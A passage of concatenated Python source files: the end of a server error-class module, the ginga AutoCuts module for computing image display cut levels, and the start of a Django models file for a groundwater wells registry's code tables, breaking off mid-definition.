self.status = 404
self.code = -32004
self.message = 'Resource/path not found.'
self.data = {
'method': method,
'path': path
}
class InternalError(BaseServerError):
def __init__(self, method=None, path=None):
super(InternalError, self).__init__()
self.status = 500
self.code = -32099
self.message = 'Internal/Unknown server error.'
self.data = {
'method': method,
'path': path
}
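# Illustrative sketch (not part of the original module): converting an error into
# an HTTP response inside a hypothetical request handler.
#
# try:
#     return handler(request)
# except BaseServerError as exc:
#     return exc.as_response()  # JSON body carrying code/message/data
#
# Unknown paths could be reported as:
#     raise NotFoundError(method='GET', path='/missing')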
|
#
# AutoCuts.py -- class for calculating auto cut levels
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import numpy as np
from ginga.misc import Bunch
#from ginga.misc.ParamSet import Param
from ginga.util import zscale
have_scipy = True
autocut_methods = ('minmax', 'median', 'histogram', 'stddev', 'zscale')
try:
import scipy.ndimage.filters
except ImportError:
have_scipy = False
autocut_methods = ('minmax', 'histogram', 'stddev', 'zscale')
class Param(Bunch.Bunch):
pass
class AutoCutsError(Exception):
pass
class AutoCutsBase(object):
@classmethod
def get_params_metadata(cls):
return []
def __init__(self, logger):
super(AutoCutsBase, self).__init__()
self.logger = logger
self.kind = 'base'
self.crop_radius = 512
def update_params(self, **param_dict):
# TODO: find a cleaner way to update these
self.__dict__.update(param_dict)
def get_algorithms(self):
return autocut_methods
def get_autocut_levels(self, image):
loval, hival = self.calc_cut_levels(image)
return loval, hival
def get_crop(self, image, crop_radius=None):
# Even with numpy, it's kind of slow for some of the autocut
# methods on a large image, so in those cases we can optionally
# take a crop of size (radius*2)x(radius*2) from the center of
# the image and calculate the cut levels on that
if crop_radius is None:
crop_radius = self.crop_radius
wd, ht = image.get_size()
(data, x1, y1, x2, y2) = image.cutout_radius(wd // 2, ht // 2,
crop_radius)
return data
def cut_levels(self, data, loval, hival, vmin=0.0, vmax=255.0):
loval, hival = float(loval), float(hival)
# ensure hival >= loval
hival = max(loval, hival)
self.logger.debug("loval=%.2f hival=%.2f" % (loval, hival))
delta = hival - loval
if delta > 0.0:
f = (((data - loval) / delta) * vmax)
# NOTE: optimization using in-place outputs for speed
f.clip(0.0, vmax, out=f)
return f
# hival == loval, so thresholding operation
f = (data - loval).clip(0.0, vmax)
f[f > 0.0] = vmax
return f
def __str__(self):
return self.kind
class Clip(AutoCutsBase):
def __init__(self, logger):
super(Clip, self).__init__(logger)
self.kind = 'clip'
def calc_cut_levels(self, image):
loval, hival = image.get_minmax()
return (float(loval), float(hival))
def cut_levels(self, data, loval, hival, vmin=0.0, vmax=255.0):
return data.clip(vmin, vmax)
class Minmax(AutoCutsBase):
def __init__(self, logger):
super(Minmax, self).__init__(logger)
self.kind = 'minmax'
def calc_cut_levels(self, image):
loval, hival = image.get_minmax()
return (float(loval), float(hival))
class Histogram(AutoCutsBase):
@classmethod
def get_params_metadata(cls):
return [
Param(name='usecrop', type=_bool,
valid=[True, False],
default=True,
description="Use center crop of image for speed"),
Param(name='pct', type=float,
widget='spinfloat', incr=0.001,
min=0.0, max=1.0, default=0.999,
description="Percentage of the histogram to retain"),
Param(name='numbins', type=int,
min=100, max=10000, default=2048,
description="Number of bins for the histogram"),
]
def __init__(self, logger, usecrop=True, pct=0.999, numbins=2048):
super(Histogram, self).__init__(logger)
self.kind = 'histogram'
self.usecrop = usecrop
self.pct = pct
self.numbins = numbins
def calc_cut_levels(self, image):
if self.usecrop:
data = self.get_crop(image)
count = np.count_nonzero(np.isfinite(data))
if count < (self.crop_radius ** 2.0) * 0.50:
# if we have less than 50% finite pixels then fall back
# to using the whole array
self.logger.debug("too many non-finite values in crop--"
"falling back to full image data")
data = image.get_data()
else:
data = image.get_data()
bnch = self.calc_histogram(data, pct=self.pct, numbins=self.numbins)
loval, hival = bnch.loval, bnch.hival
return loval, hival
def calc_histogram(self, data, pct=1.0, numbins=2048):
self.logger.debug("Computing histogram, pct=%.4f numbins=%d" % (
pct, numbins))
height, width = data.shape[:2]
self.logger.debug("Median analysis array is %dx%d" % (
width, height))
total_px = width * height
dsum = np.sum(data)
if np.isnan(dsum) or np.isinf(dsum):
# Oh crap, the array has a NaN or Inf value.
# We have to workaround this by making a copy of the array
# and substituting for the problem values, otherwise numpy's
# histogram() cannot handle it
self.logger.warning("NaN's found in data, using workaround for histogram")
data = data.copy()
# TODO: calculate a reasonable replacement value
data[np.isinf(data)] = 0.0
minval = np.nanmin(data)
maxval = np.nanmax(data)
substval = (minval + maxval) / 2.0
data[np.isnan(data)] = substval
data[np.isinf(data)] = substval
## dsum = np.sum(data)
## if np.isnan(dsum) or np.isinf(dsum):
## print "NaNs STILL PRESENT"
dist, bins = np.histogram(data, bins=numbins,
density=False)
else:
dist, bins = np.histogram(data, bins=numbins,
density=False)
cutoff = int((float(total_px) * (1.0 - pct)) / 2.0)
top = len(dist) - 1
self.logger.debug("top=%d cutoff=%d" % (top, cutoff))
#print "DIST: %s\nBINS: %s" % (str(dist), str(bins))
# calculate low cutoff
cumsum = np.cumsum(dist)
li = np.flatnonzero(cumsum > cutoff)
if len(li) > 0:
i = li[0]
count_px = cumsum[i]
else:
i = 0
count_px = 0
if i > 0:
nprev = cumsum[i - 1]
else:
nprev = 0
loidx = i
# interpolate between last two low bins
val1, val2 = bins[i], bins[i + 1]
divisor = float(count_px) - float(nprev)
if divisor > 0.0:
interp = (float(cutoff) - float(nprev)) / divisor
else:
interp = 0.0
loval = val1 + ((val2 - val1) * interp)
self.logger.debug("loval=%f val1=%f val2=%f interp=%f" % (
loval, val1, val2, interp))
# calculate high cutoff
revdist = dist[::-1]
cumsum = np.cumsum(revdist)
li = np.flatnonzero(cumsum > cutoff)
if len(li) > 0:
i = li[0]
count_px = cumsum[i]
else:
i = 0
count_px = 0
if i > 0:
nprev = cumsum[i - 1]
else:
nprev = 0
j = top - i
hiidx = j + 1
# interpolate between last two high bins
val1, val2 = bins[j], bins[j + 1]
divisor = float(count_px) - float(nprev)
if divisor > 0.0:
interp = (float(cutoff) - float(nprev)) / divisor
else:
interp = 0.0
hival = val1 + ((val2 - val1) * interp)
self.logger.debug("hival=%f val1=%f val2=%f interp=%f" % (
hival, val1, val2, interp))
return Bunch.Bunch(dist=dist, bins=bins, loval=loval, hival=hival,
loidx=loidx, hiidx=hiidx)
class StdDev(AutoCutsBase):
@classmethod
def get_params_metadata(cls):
return [
Param(name='usecrop', type=_bool,
valid=[True, False],
default=True,
description="Use center crop of image for speed"),
## Param(name='hensa_lo', type=float, default=35.0,
## description="Low subtraction factor"),
## Param(name='hensa_hi', type=float, default=90.0,
## description="High subtraction factor"),
]
def __init__(self, logger, usecrop=True):
super(StdDev, self).__init__(logger)
self.kind = 'stddev'
# Constants used to calculate the lo and hi cut levels using the
# "stddev" algorithm (from the old SOSS fits viewer)
self.usecrop = usecrop
self.hensa_lo = 35.0
self.hensa_hi = 90.0
def calc_cut_levels(self, image):
if self.usecrop:
data = self.get_crop(image)
count = np.count_nonzero(np.isfinite(data))
if count < (self.crop_radius ** 2.0) * 0.50:
# if we have less than 50% finite pixels then fall back
# to using the whole array
self.logger.info("too many non-finite values in crop--"
"falling back to full image data")
data = image.get_data()
else:
data = image.get_data()
loval, hival = self.calc_stddev(data, hensa_lo=self.hensa_lo,
hensa_hi=self.hensa_hi)
return loval, hival
def calc_stddev(self, data, hensa_lo=35.0, hensa_hi=90.0):
# This is the method used in the old SOSS fits viewer
mdata = np.ma.masked_array(data, np.isnan(data))
mean = np.mean(mdata)
sdev = np.std(mdata)
self.logger.debug("mean=%f std=%f" % (mean, sdev))
hensa_lo_factor = (hensa_lo - 50.0) / 10.0
hensa_hi_factor = (hensa_hi - 50.0) / 10.0
loval = hensa_lo_factor * sdev + mean
hival = hensa_hi_factor * sdev + mean
return loval, hival
class MedianFilter(AutoCutsBase):
@classmethod
def get_params_metadata(cls):
return [
## Param(name='usecrop', type=_bool,
## valid=set([True, False]),
## default=True,
## description="Use center crop of image for speed"),
Param(name='num_points', type=int,
default=2000, allow_none=True,
description="Number of points to sample"),
Param(name='length', type=int, default=5,
description="Median kernel length"),
]
def __init__(self, logger, num_points=2000, length=5):
super(MedianFilter, self).__init__(logger)
self.kind = 'median'
self.num_points = num_points
self.length = length
def calc_cut_levels(self, image):
wd, ht = image.get_size()
# sample the data
xmax = wd - 1
ymax = ht - 1
# evenly spaced sampling over rows and cols
xskip = int(max(1.0, np.sqrt(xmax * ymax / float(self.num_points))))
yskip = xskip
cutout = image.cutout_data(0, 0, xmax, ymax,
xstep=xskip, ystep=yskip)
loval, hival = self.calc_medianfilter(cutout, length=self.length)
return loval, hival
def calc_medianfilter(self, data, length=5):
assert len(data.shape) >= 2, \
AutoCutsError("input data should be 2D or greater")
if length is None:
length = 5
xout = scipy.ndimage.filters.median_filter(data, size=length)
loval = np.nanmin(xout)
hival = np.nanmax(xout)
return loval, hival
class ZScale(AutoCutsBase):
"""
Based on STScI's numdisplay implementation of IRAF's ZScale.
"""
@classmethod
def get_params_metadata(cls):
return [
Param(name='contrast', type=float,
default=0.25, allow_none=False,
description="Contrast"),
Param(name='num_points', type=int,
default=1000, allow_none=True,
description="Number of points to sample"),
]
def __init__(self, logger, contrast=0.25, num_points=1000):
super(ZScale, self).__init__(logger)
self.kind = 'zscale'
self.contrast = contrast
self.num_points = num_points
def calc_cut_levels(self, image):
wd, ht = image.get_size()
# calculate num_points parameter, if omitted
total_points = wd * ht
if total_points == 0:
self.logger.debug('total_points is 0, setting cut levels to 0')
return 0, 0
num_points = self.num_points
if num_points is None:
num_points = max(int(total_points * 0.0002), 1000)
num_points = min(num_points, total_points)
assert (0 < num_points <= total_points), \
AutoCutsError("num_points not in range 0-%d" % (total_points))
# sample the data
xmax = wd - 1
ymax = ht - 1
# evenly spaced sampling over rows and cols
xskip = int(max(1.0, np.sqrt(xmax * ymax / float(num_points))))
yskip = xskip
cutout = image.cutout_data(0, 0, xmax, ymax,
xstep=xskip, ystep=yskip)
loval, hival = self.calc_zscale(cutout, contrast=self.contrast,
num_points=self.num_points)
return loval, hival
def calc_zscale(self, data, contrast=0.25, num_points=1000):
# NOTE: num_per_row is ignored in this implementation
assert len(data.shape) >= 2, \
AutoCutsError("input data should be 2D or greater")
ht, wd = data.shape[:2]
# sanity check on contrast parameter
assert (0.0 < contrast <= 1.0), \
AutoCutsError("contrast (%.2f) not in range 0 < c <= 1" % (
contrast))
# remove masked elements, they cause problems
data = data[np.logical_not(np.ma.getmaskarray(data))]
# remove NaN and Inf from samples
samples = data[np.isfinite(data)].flatten()
samples = samples[:num_points]
loval, hival = zscale.zscale_samples(samples, contrast=contrast)
return loval, hival
# funky boolean converter
_bool = lambda st: str(st).lower() == 'true' # noqa
autocuts_table = {
'clip': Clip,
'minmax': Minmax,
'stddev': StdDev,
'histogram': Histogram,
'median': MedianFilter,
'zscale': ZScale,
}
def get_autocuts(name):
if name not in autocut_methods:
raise AutoCutsError("Method '%s' is not supported" % (name))
return autocuts_table[name]
def get_autocuts_names():
l = list(autocuts_table.keys())
l.sort()
return l
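# A minimal usage sketch (an illustration only, assuming an image object that
# exposes get_size() and cutout_data(), e.g. a ginga-style AstroImage, and a
# standard Python logger):
#
#     klass = get_autocuts('zscale')
#     ac = klass(logger, contrast=0.25)
#     loval, hival = ac.calc_cut_levels(image)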
# END
|
"""
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import uuid
import math
import reversion
from decimal import Decimal
from django.core.exceptions import ValidationError
from django.core.validators import MinValueValidator
from django.utils import timezone
from django.dispatch import receiver
from django.db.models.signals import pre_save
from django.contrib.gis.db import models
from django.contrib.gis.gdal import SpatialReference, CoordTransform
from gwells.models import AuditModel, ProvinceStateCode, ScreenIntakeMethodCode, ScreenMaterialCode,\
ScreenOpeningCode, ScreenBottomCode, ScreenTypeCode, ScreenAssemblyTypeCode, CodeTableModel,\
BasicCodeTableModel
from gwells.models.common import AuditModelStructure
from gwells.models.lithology import (
LithologyDescriptionCode, LithologyColourCode, LithologyHardnessCode,
LithologyMaterialCode, BedrockMaterialCode, BedrockMaterialDescriptorCode, LithologyStructureCode,
LithologyMoistureCode, SurficialMaterialCode)
from gwells.db_comments.patch_fields import patch_fields
# from aquifers.models import Aquifer
patch_fields()
WELL_STATUS_CODE_CONSTRUCTION = 'NEW'
WELL_STATUS_CODE_DECOMMISSION = 'CLOSURE'
WELL_STATUS_CODE_ALTERATION = 'ALTERATION'
WELL_STATUS_CODE_OTHER = 'OTHER'
class DecommissionMethodCode(CodeTableModel):
decommission_method_code = models.CharField(primary_key=True, max_length=10, editable=False,
verbose_name="Code")
description = models.CharField(max_length=255, verbose_name="Description")
class Meta:
db_table = 'decommission_method_code'
ordering = ['display_order']
db_table_comment = 'Describes the method used to fill the well to close it permanently.'
def __str__(self):
return self.description
class BCGS_Numbers(AuditModel):
bcgs_id = models.BigIntegerField(primary_key=True, editable=False)
bcgs_number = models.CharField(
max_length=20, verbose_name="BCGS Mapsheet Number")
class Meta:
db_table = 'bcgs_number'
db_table_comment = 'Placeholder table comment.'
def __str__(self):
return self.bcgs_number
class ObsWellStatusCode(CodeTableModel):
"""
Observation Well Status.
"""
obs_well_status_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=255)
class Meta:
db_table = 'obs_well_status_code'
ordering = ['display_order', 'obs_well_status_code']
db_table_comment = ('Status of an observation well within the Provincial Groundwater Observation Well '
'Network. I.e. Active is a well that is currently being used to collect groundwater '
'information, and inactive is a well that is no longer being used to collect '
'groundwater information.')
def save(self, *args, **kwargs):
self.validate()
        super(ObsWellStatusCode, self).save(*args, **kwargs)
class YieldEstimationMethodCode(CodeTableModel):
"""
The method used to estimate the yield of a well, e.g. Air Lifting, Bailing, Pumping.
"""
yield_estimation_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'yield_estimation_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('Describes the valid methods that can be used to estimate the yield of a well. E.g.'
' Air Lifting, Bailing, Pumping, Other.')
def __str__(self):
return self.description
class WaterQualityCharacteristic(AuditModel):
"""
The characteristic of the well water, e.g. Fresh, Salty, Clear.
"""
code = models.CharField(primary_key=True, max_length=10,
db_column='water_quality_characteristic_code')
description = models.CharField(max_length=100)
display_order = models.PositiveIntegerField(
db_comment='The order in which the codes may display on screen.'
)
class Meta:
db_table = 'water_quality_characteristic'
ordering = ['display_order', 'description']
db_table_comment = ('Valid values that can be used to indicate the quality of the water for a well as'
' recorded at time of work. E.g. Clear, Cloudy, Fresh, Gas, Salty, Sediment.')
def __str__(self):
return self.description
class DevelopmentMethodCode(CodeTableModel):
"""
How the well was developed in order to remove the fine sediment and other organic or inorganic material
that immediately surrounds the well screen, the drill hole or the intake area at the bottom of the well,
e.g. air lifting, pumping, bailing.
"""
development_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'development_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('The methods used to remove the fine sediment and other organic or inorganic '
'material that immediately surrounds the well screen, the drill hole or the intake '
'area at the bottom of the well. E.g. Air Lifting, Bailing, Jetting, Pumping, '
'Surging. \'Other\' can also be specified.')
def __str__(self):
return self.description
class FilterPackMaterialSizeCode(CodeTableModel):
"""
The size of material used to pack a well filter, e.g. 1.0 - 2.0 mm, 2.0 - 4.0 mm, 4.0 - 8.0 mm.
"""
filter_pack_material_size_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'filter_pack_material_size_code'
ordering = ['display_order', 'description']
db_table_comment = ('Codes for the sizes of the material used to pack a well filter. Some examples of '
'filter pack sizes are: 1.0 - 2.0 mm, 2.0 - 4.0 mm, 4.0 - 8.0 mm.')
def __str__(self):
return self.description
class BoundaryEffectCode(CodeTableModel):
"""
The observed boundary effect in the pumping test analysis.
"""
boundary_effect_code = models.CharField(primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'boundary_effect_code'
ordering = ['display_order', 'description']
db_table_comment = ('The observed boundary effect in the pumping test analysis. Constant head or '
'no flow boundaries are two possible observations.')
def __str__(self):
return self.description
class WellDisinfectedCode(CodeTableModel):
"""
The status on whether the well has been disinfected or not.
"""
well_disinfected_code = models.CharField(primary_key=True, max_length=100, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'well_disinfected_code'
ordering = ['display_order', 'description']
        db_table_comment = ('Codes for the well disinfected status. If the disinfected status on a legacy well '
                            'is unknown, then the null status is mapped to the Unknown value.')
def __str__(self):
return self.description
class WellOrientationCode(CodeTableModel):
"""
Codes describing the orientation of the well
"""
well_orientation_code = models.CharField(primary_key=True, max_length=100, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'well_orientation_code'
ordering = ['display_order', 'description']
        db_table_comment = ('Codes for the well orientation. Horizontal and Vertical are the only codes at this point.')
def __str__(self):
return self.description
class DriveShoeCode(CodeTableModel):
"""
The status on whether a casing has a drive shoe installed.
"""
drive_shoe_code = models.CharField(primary_key=True, max_length=100, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'drive_shoe_code'
ordering = ['display_order', 'description']
db_table_comment = ('Codes for drive shoe installation on a casing.')
def __str__(self):
return self.description
class FilterPackMaterialCode(CodeTableModel):
"""
The material used to pack a well filter, e.g. Very coarse sand, Very fine gravel, Fine gravel.
"""
filter_pack_material_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'filter_pack_material_code'
ordering = ['display_order', 'description']
db_table_comment = ('Materials used in the filter pack, which are placed in the annulus of the well '
'between the borehole wall and the well screen, and are used to settle-out fine '
'grained particles that may otherwise enter the well. I.e. Fine gravel, very coarse '
'sand, very fine gravel, other.')
def __str__(self):
return self.description
class LinerMaterialCode(CodeTableModel):
"""
Liner material installed in a well to protect the well pump or other works in the well from damage.
"""
code = models.CharField(
primary_key=True, max_length=10, editable=False, db_column='liner_material_code')
description = models.CharField(max_length=100)
class Meta:
db_table = 'liner_material_code'
ordering = ['display_order', 'description']
db_table_comment = ('Describes the material of the piping or tubing installed in a well which protects '
'the well pump or other works in the well from damage. i.e. PVC, Other')
def __str__(self):
return self.description
class SurfaceSealMethodCode(CodeTableModel):
"""
Method used to install the surface seal in the annular space around the outside of the outermost casing
    and between multiple casings of a well.
"""
surface_seal_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'surface_seal_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('Valid methods used to create the surface seal for a well. i.e. Poured, Pumped,'
' Other.')
def __str__(self):
return self.description
class SurfaceSealMaterialCode(CodeTableModel):
"""
Sealant material used that is installed in the annular space around the outside of the outermost casing
and between multiple casings of a well.
"""
surface_seal_material_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'surface_seal_material_code'
ordering = ['display_order', 'description']
db_table_comment = ('Valid materials used for creating the surface seal for a well. A surface seal is a'
' plug that prevents surface runoff from getting into the aquifer or well and'
' contaminating the water. E.g. Bentonite clay, Concrete grout, Sand cement grout,'
' Other.')
def __str__(self):
return self.description
class DrillingMethodCode(CodeTableModel):
"""
The method used to drill a well. For example, air rotary, dual rotary, cable tool, excavating, other.
"""
drilling_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'drilling_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('Represents the method that was used to drill or construct a well. E.g. Excavated, '
'Dual Rotary, Driving, Other, Unknown.')
def __str__(self):
return self.description
class LandDistrictCode(CodeTableModel):
"""
Lookup of Legal Land Districts.
"""
land_district_code = models.CharField(
primary_key=True, max_length=10, editable=False)
name = models.CharField(max_length=255)
class Meta:
db_table = 'land_district_code'
ordering = ['display_order', 'name']
def __str__(self):
return self.name
db_table_comment = ('Legal Land District used to help identify the property where the well is located. '
'E.g. Alberni, Barclay, Cariboo.')
class LicencedStatusCode(CodeTableModel):
"""
LicencedStatusCode of Well.
"""
licenced_status_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(
max_length=255,
verbose_name='Licence Status')
class Meta:
db_table = 'licenced_status_code'
ordering = ['display_order', 'licenced_status_code']
        db_table_comment = ('Valid licencing options granted to a well under the Water Sustainability '
'Act. This information comes from eLicensing. i.e. Unlicensed, Licensed, Historical')
db_column_supplemental_comments = {
"description":"Descriptions of valid licensing options granted to a well under the Water Sustainability Act. This information comes from eLicensing. i.e. Unlicensed, Licensed, Historical",
"licenced_status_code":"Valid licensing options granted to a well under the Water Sustainability Act. This information comes from eLicensing. i.e. Unlicensed, Licensed, Historical.",
}
def save(self, *args, **kwargs):
self.validate()
super(LicencedStatusCode, self).save(*args, **kwargs)
class IntendedWaterUseCode(CodeTableModel):
"""
Usage of Wells (water supply).
"""
intended_water_use_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(
max_length=100,
        verbose_name='Intended Water Use')
class Meta:
db_table = 'intended_water_use_code'
ordering = ['display_order', 'description']
db_table_comment = ('The intended use of the water in a water supply well as reported by the driller at '
'time of work completion on the well. E.g Private domestic, irrigation, water '
'supply system, Industrial commercial, and unknown.')
db_column_supplemental_comments = {
"description":"The intended use of the water in a water supply well as reported by the driller at time of work completion on the well. E.g Private Domestic, Irrigation, Water Supply System, Commercial and Industrial, Unknown, Other",
"intended_water_use_code":"The intended use of the water in a water supply well as reported by the driller at time of work completion on the well. E.g, DOM, IRR, DWS, COM, UNK, OTHER",
}
def __str__(self):
return self.description
class GroundElevationMethodCode(CodeTableModel):
"""
The method used to determine the ground elevation of a well.
Some examples of methods to determine ground elevation include:
GPS, Altimeter, Differential GPS, Level, 1:50,000 map, 1:20,000 map, 1:10,000 map, 1:5,000 map.
"""
ground_elevation_method_code = models.CharField(
primary_key=True, max_length=10, editable=False)
description = models.CharField(max_length=100)
class Meta:
db_table = 'ground_elevation_method_code'
ordering = ['display_order', 'description']
db_table_comment = ('Method used to determine the ground elevation of a well. E.g. GPS, Altimeter, '
'Differential GPS, Level, 1:50,000 map, 1:20,000 map.')
def __str__(self):
return self.description
class WellClassCode(CodeTableModel):
"""
Class of Well type.
"""
well_class_code = models.CharField(
primary_key=True, max_length=10, editable=False,
db_comment=('Valid classifications as defined in the Groundwater Protection Regulation of the'
' Water Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering,'
' Drainage, Remediation, Geotechnical, Closed-loop geoexchange.'))
description = models.CharField(
max_length=100, verbose_name='Well Class',
db_comment=('Descriptions of valid classifications as defined in the Groundwater Protection'
' Regulation of the Water Act. E.g. Water Supply, Monitoring, Recharge / Injection,'
' Dewatering / Drainage, Remediation, Geotechnical.'))
class Meta:
db_table = 'well_class_code'
ordering = ['display_order', 'description']
db_table_comment = ('Valid classifications as defined in the Groundwater Protection Regulation of the'
' Water Sustainability Act. E.g. Water Supply, Monitoring, Recharge / Injection,'
' Dewatering / Drainage, Remediation, Geotechnical.')
db_column_supplemental_comments = {
"description":"Descriptions of valid classifications as defined in the Groundwater Protection Regulation of the Water Sustainability Act. E.g. Water Supply, Monitoring, Recharge / Injection, Dewatering / Drainage, Remediation, Geotechnical.",
"well_class_code":"Valid classifications as defined in the Groundwater Protection Regulation of the Water Sustainability Act. i.e. Unknown, Water Supply, Monitoring, Recharge, Injection, Dewatering, Drainage, Remediation, Geotechnical, Closed-loop geoexchange.",
}
def __str__(self):
return self.description
class WellStatusCodeTypeManager(models.Manager):
"""
Provides additional methods for returning well status codes that correspond
to activity submissions
"""
# Construction reports correspond to "NEW" status
def construction(self):
return self.get_queryset().get(well_status_code=WELL_STATUS_CODE_CONSTRUCTION)
# Decommission reports trigger a "CLOSURE" status
def decommission(self):
return self.get_queryset().get(well_status_code=WELL_STATUS_CODE_DECOMMISSION)
# Alteration reports trigger an "ALTERATION" status
def alteration(self):
return self.get_queryset().get(well_status_code=WELL_STATUS_CODE_ALTERATION)
def other(self):
return self.get_queryset().get(well_status_code=WELL_STATUS_CODE_OTHER)
class WellStatusCode(CodeTableModel):
"""
Well Status.
"""
well_status_code = models.CharField(
primary_key=True, max_length=10, editable=False,
db_comment=('Status of a well indicates whether the report relates to the construction,'
' alteration, or decommission of the well; e.g., Construction, Alteration,'
                    ' Abandoned, Decommission.'))
description = models.CharField(
max_length=255,
verbose_name='Well Status',
db_comment=('Description of the status of a well as defined in the Groundwater Protection Regulation of the Water Sustainability Act. i.e. New, Abandoned (exists in Wells but will not be used for E-Wells), Alteration, Closure, Other.'))
objects = models.Manager()
types = WellStatusCodeTypeManager()
class Meta:
db_table = 'well_status_code'
ordering = ['display_order', 'well_status_code']
db_table_comment = ('Status of a well indicates whether the report relates to the construction,'
                            ' alteration, or decommission of the well; e.g., Construction, Alteration,'
                            ' Abandoned, Decommission.')
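# A minimal usage sketch for the custom manager above (an illustration only,
# assuming the well_status_code table rows have been loaded):
#
#     new_status = WellStatusCode.types.construction()      # the 'NEW' code row
#     closed_status = WellStatusCode.types.decommission()   # the 'CLOSURE' code row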
class WellPublicationStatusCode(CodeTableModel):
"""
Well Publication Status.
"""
well_publication_status_code = models.CharField(
primary_key=True, max_length=20, editable=False, null=False)
description = models.CharField(max_length=255, null=False)
class Meta:
db_table = 'well_publication_status_code'
ordering = ['display_order', 'well_publication_status_code']
class WellSubclassCode(CodeTableModel):
"""
Subclass of Well type; we use GUID here as Django doesn't support multi-column PK's
"""
well_subclass_guid = models.UUIDField(
primary_key=True, default=uuid.uuid4, editable=False)
well_class = models.ForeignKey(
WellClassCode, null=True, db_column='well_class_code',
on_delete=models.PROTECT, blank=True,
db_comment=('Valid classifications as defined in the Groundwater Protection Regulation of the Water Sustainability Act. i.e. Water Supply, Monitoring, Recharge, Injection, Dewatering, Drainage, Remediation, Geotechnical, Closed-loop geoexchange.'))
well_subclass_code = models.CharField(max_length=10)
description = models.CharField(max_length=100)
class Meta:
db_table = 'well_subclass_code'
ordering = ['display_order', 'description']
db_table_comment = ('Valid methods used to further classify a well within the main classification'
' (well_class_code). It provides for a standard commonly understood code and'
                            ' description for well sub-classification as defined in the Groundwater Protection'
                            ' Regulation of the Water Act. i.e. Domestic, Borehole, Closed Loop Geothermal,'
                            ' Non-domestic, Permanent, Special, Temporary, Test Pit.')
    def validate_unique(self, exclude=None):
        # A subclass code must be unique within its parent well class; exclude the
        # current row so updating an existing record does not trip the check.
        qs = WellSubclassCode.objects.exclude(pk=self.pk).filter(
            well_subclass_code=self.well_subclass_code)
        if qs.filter(well_class=self.well_class).exists():
            raise ValidationError('Code must be unique per Well Class')
def save(self, *args, **kwargs):
self.validate_unique()
super(WellSubclassCode, self).save(*args, **kwargs)
def __str__(self):
return self.description
class WellYieldUnitCode(CodeTableModel):
"""
Units of Well Yield.
"""
well_yield_unit_code = models.CharField(
primary_key=True, max_length=10, editable=False,
        db_comment=('ASK DEVELOPERS TO DELETE THIS COLUMN once the \'yield\' column has been fully'
                    ' converted to USGPM. Describes the unit of measure that was used for the well'
                    ' yield. All codes except U.S. Gallons per Minute have been retired, as all data'
                    ' from April 2019 will be reported in USGPM. Examples of other codes that have been'
                    ' used in the past are GPM, DRY, UNK.'))
description = models.CharField(
max_length=100, verbose_name='Well Yield Unit',
db_comment=('Describes the unit of measure that was used for the well yield. All codes except'
                    ' the U.S. Gallons per Minute have been retired as all data from April 2019 will be'
                    ' reported in U.S. Gallons per Minute. Examples of other codes that have been used in the'
' past are Gallons per Minute (U.S./Imperial), Dry Hole, Unknown Yield.'))
class Meta:
db_table = 'well_yield_unit_code'
ordering = ['display_order', 'description']
db_table_comment = ('Describes the unit of measure that was used for the well yield. All codes except'
                            ' the U.S. Gallons per Minute have been retired as all data from April 2019 will be'
                            ' reported in U.S. Gallons per Minute. Examples of other codes that have been used in the'
' past are Gallons per Minute (U.S./Imperial), Dry Hole, Unknown Yield.')
def __str__(self):
return self.description
class CoordinateAcquisitionCode(BasicCodeTableModel):
"""
• A = (10 m accuracy) ICF cadastre and good location sketch
• B = (20 m accuracy) Digitized from 1:5,000 mapping
• C = (50 m accuracy) Digitized from 1:20,000 mapping
• D = (100 m accuracy) Digitized from old Dept. of Lands, Forests and Water Resources maps
• E = (200 m accuracy) Digitized from 1:50,000 maps
• F = (1 m accuracy) CDGPS
• G = (unknown, accuracy based on parcel size) No ICF cadastre, poor or no location sketch; site
located in center of primary parcel
• H = (10 m accuracy) Handheld GPS with accuracy of +/- 10 metres
• I = (20 m accuracy) No ICF cadastre but good location sketch or good written description
• J = (unknown, accuracy based on parcel size) ICF cadastre, poor or no location sketch, arbitrarily
located in center of parcel
"""
code = models.CharField(
primary_key=True, max_length=1, editable=False,
db_column='coordinate_acquisition_code',
db_comment=('Codes for the accuracy of the coordinate position, which is best estimated based on'
' the information provided by the data submitter and analysis done by staff. E.g. A,'
' B, C.'))
description = models.CharField(
max_length=250,
        db_comment=('A description of the coordinate_acquisition_code. It describes how accurate the coordinate position is estimated based on the information provided by the data submitter and analysis done by staff. E.g. (10 m accuracy) ICF cadastre and good location sketch, (200 m accuracy) Digitized from 1:50,000 mapping, (unknown, accuracy based on parcel size) ICF cadastre, poor or no location sketch, arbitrarily located in center of parcel.'))
class Meta:
db_table = 'coordinate_acquisition_code'
ordering = ['code', ]
db_table_comment = ('A description of how accurate the coordinate position is best estimated to be based'
